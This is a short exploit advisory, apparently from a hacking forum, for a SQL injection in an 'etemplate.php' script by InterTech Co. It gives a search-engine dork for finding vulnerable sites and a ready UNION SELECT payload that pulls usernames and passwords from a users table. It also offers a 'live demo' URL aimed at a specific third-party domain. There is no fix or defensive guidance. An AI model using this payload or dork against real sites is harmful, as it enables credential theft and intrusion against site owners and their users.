######################################################### # # InterTech Co (etemplate php) Remote SQL Injection Vulnerability # ######################################################### # # Author: GeNiUs IrAQI # # Home : www.iq-ty.com/vb # # email: gi737[at]yahoo[dot]com # # ########################################################## # # # script : http://www.intertech.ps/ # # ########################################################## Dork: inurl:etemplate.php?id= Exploit: www.[target].com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users-- L!VE DEMO: http://www.pecdar.ps/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users-- ###############( Greetz )################# All My friends of the Forum WwW.IQ-TY.CoM Donation and special thanks to teachers ( Hussin x ) ########################################